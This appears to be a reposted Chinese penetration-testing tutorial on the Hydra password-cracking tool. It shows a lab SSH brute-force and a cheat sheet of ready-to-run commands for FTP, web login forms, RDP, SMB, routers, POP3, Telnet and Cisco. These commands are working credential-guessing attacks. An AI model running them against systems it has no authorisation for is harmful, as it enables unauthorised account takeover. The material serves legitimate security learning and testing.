首页 > 其他分享 >九头蛇密码爆破工具

九头蛇密码爆破工具

时间:2023-04-11 22:44:41浏览次数:36  
标签:九头 用户名 爆破 密码 hydra http 破解 字典

渗透测试:九头蛇(hydra)密码爆破工具

学神丶键仙 编码安全研究 2023-04-09 15:10 发表于北京 收录于合集#web安全63个

美国漫威漫画旗下的超级反派组织—hydra(九头蛇),大家对它还有印象吗?

HYDRA是著名组织THC的一款开源的暴力破解密码工具,其功能非常强大的;

图片

密码能否破解的关键,在于字典是否强大以及电脑的性能。

今天我们就来详细的介绍一下,这个装备到底该如何使用?

图片

1

使用方法

语法:Hydra 参数 IP 服务

参数:-l login 小写,指定用户名进行破解-L file 大写,指定用户的用户名字典-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。-P file 大写,用于指定密码字典。-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探-M file 指定目标ip列表文件,批量破解。-o file 指定结果输出文件-f 找到第一对登录名或者密码的时候中止破解。-t tasks 同时运行的线程数,默认是16-w time 设置最大超时时间,单位-v / -V 显示详细过程-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)-x 自定义密码。

 

service:指定服务名,支持的服务跟协议有:telnet,ftp,pop3等等。注意点:1.自己创建字典,然后放在当前的目录下或者指定目录。2.参数可以统一放在最后,格式比如hydra ip 服务 参数。3.如果能确定用户名一项时候,比如web登录破解,直接用 -l就可以,然后剩余时间破解密码。4.缺点,如果目标网站登录时候需要验证码就无法破解。5.man hydra最万能。6.或者hydra -U http-form等查看具体帮助。

 

2

环境介绍

攻击机:kali装有hydra工具 
靶机:192.168.154.131安装ssh服务,正常运行

 

为了测试方便,我们创建两个简单的字典文件,如下:

图片

 

3

开始爆破

根据命令参数,组织参数格式如下:

root@kali:/mnt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh

 

4

破解成功

       因为字典数量比较少,我们可以轻易的破解成功,但是实际情况下,我们可能需要很久。

 

5

测试登录

使用得到的用户名/密码登录服务器,登录成功

图片

 

6

各种协议破解汇总

FTP协议破解

破解ftp: hydra -L 用户名字典 -P 密码字典 -t 6 -e ns IP地址 -v

http协议破解

 

get方式提交,破解web登录: hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns IP地址 http-get /admin/ hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns -f IP地址 http-get /admin/index.php 
post方式提交,破解web登录:
hydra -f -l 用户名 -P 密码字典 -V -s 9900 IP地址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"
#/index.php …这个是登录的 url #后门是POST的数据 其中的用户名密码使用 USER PASS 来代替#然后是如果登录出错 会出现的字符 。。。然后开始破解

 

https协议破解

破解https hydra -m /index.php -l 用户名 -P 密码字典.txt IP地址 https

路由器破解

hydra -l admin -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get / -l admin 为尝试破解的用户名。# -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成,长度为 6 - 10 位。-t 8 表示分 8 个并行任务进行爆破尝试。192.168.1.1 为 Router 地址。http-get 为破解方式(协议)

 

http-proxy协议破解

破解http-proxy:hydra -l admin -P 字典.txt http-proxy://IP地址

 

smb破解

 

破解smb: hydra -l 用户名字典 -P 密码字典 IP地址 smb

Windows远程桌面

破解rdp(windows远程登录):hydra ip地址 rdp -l administrator -P 密码字典.txt -V 

 


邮箱pop3

破解邮箱pop3:hydra -l 用户名 -P 密码字典.txt my.pop3.mail pop3 

 

telnet破解

hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V 

 

语音通讯工具teamspeak

hydra -l 用户名字典 -P 密码字典.txt -s 端口号 -vV ip teamspeak 

cisco

hydra -P 密码字典 IP地址 cisco hydra -m cloud -P 密码字典 IP地址 cisco-enable

 

到这里就结束了,kali下是默认安装的,几乎支持所有协议的在线破解,大家也可以尝试一下 

 

注:如有侵权请联系删除

图片

   学习更多技术,关注我:   

编码安全研究 专注于学习网络安全 公众号 觉得文章不错给点个‘再看’吧。 收录于合集 #web安全  63个 上一篇一次获取webshell的经历下一篇干货 | 一次实战中对tp5网站getshell方式的测试 阅读 606    

标签:九头,用户名,爆破,密码,hydra,http,破解,字典
From: https://www.cnblogs.com/cherishthepresent/p/17308151.html

相关文章

  • vmware esxi 用户名(账号)密码明明正确,网页却无法登录管理后台的解决办法大全
    相信使用过VmwareEsxi虚拟系统的网友们可能都偶尔遇到过,明明vmwareesxi用户名密码是正确的,管理网页却无法登录管理的现象。一、账号密码正常但无法登录现象:隔了一段时间没有登录,用服务器名或IP再登录Vmware的网页管理后台,输入正确的管理员用户名及密码,之前登录都非常正常......
  • PAT Basic 1081. 检查密码
    PATBasic1081.检查密码1.题目描述:本题要求你帮助某网站的用户注册模块写一个密码合法性检查的小功能。该网站要求用户设置的密码必须由不少于6个字符组成,并且只能有英文字母、数字和小数点 .,还必须既有字母也有数字。2.输入格式:输入第一行给出一个正整数N(≤100),随后N......
  • MySQL 5.6.39 修改 root 密码不生效
    记一次MySQL 修改 root 密码不生效的问题,修改密码后新密码不生效,依旧只能使用旧密码登录,改了个寂寞。一、版本MySQL5.6.39二、问题使用 update 命令修改密码:updateusersetpassword=password('新密码')whereuser='root'andhost='%';刷新权限:flushprivilege......
  • MySql8.0修改root密码
    MySQL5.7 的版本,因为在user表中没有password字段,一直使用下边的方式来修改root密码usemysql;updateusersetauthentication_string=password('root') whereuser='root'现在要用MySQL8.0.11版本,装好MySQL后用上边方法修改密码,一直报错。后来去掉password()函数后,没有报......
  • 使用vCenter的主机配置文件重置ESXi主机密码,无需重启
    说在前面ESXi主机多次输入用户名密码错误之后,账号会被锁定900秒(15分钟),在此期间即使输入了正确的密码也不会进入到系统里;(而且会导致计时器重置,不妨等一等)前言在日常过程中由于配置好ESXi主机后很久不登录,或者更改密码时疏忽导致改过的密码怎么输入都不对,这个时候肯定......
  • 天坑,os root密码过期,导致主机crontab自动任务罢工
    告警clickhouse日志报错 访问的表不存在!明明我们设定crontab定时任务了啊,怎么没有建表呢?查看crontab定时任务及其进程运行情况crond为 active且启动在7months9daysago,但是有信息显示expiredpasswordforuserroot,任务没有如期执行原因指向root密码过期。先登......
  • php连接mysql 的错误:用户密码使用了旧版本的加密方式
    CannotconnecttoDatabase,pleasecheckyourconfiguration:错误代号:2000 mysqlndcannotconnecttoMySQL4.1+usingtheoldinsecureauthentication.PleaseuseanadministrationtooltoresetyourpasswordwiththecommandSETPASSWORD=PASSWORD('you......
  • GitLab 忘记密码
    使用root权限进入gitlab所在的linux服务器,打开一个终端,输入以下命令:gitlab-railsconsole-eproduction这个-e的参数一定不能少,命令比较慢,几十秒后,会进入控制台。查找root用户:user=User.where(id:1).first修改密码:user.password='newpassword'再次确认修改密码:......
  • Linux密码过期问题
    登录Linux服务器,遭遇Youarerequiredtochangeyourpasswordimmediately(passwordaged)问题。可以通过chage命令去掉这个过期机制呢。chage命令变更服务器的密码过期策略查看root用户的当前设定chage-lrootchage-lroot最近一次密码修改时间......
  • 在mtk7561开发板,从指令去实现wifi各种配置参数 、查看用户名和密码
    (141条消息)在mtk7561开发板,从指令去实现wifi各种配置参数、查看用户名和密码_ssid使能_xxno的博客-CSDN博客 asuswrt-merlin/nvram_control.cat263449f32bf292fb6bc5a08cd645e61a7fb10485·RMerl/asuswrt-merlin(github.com)......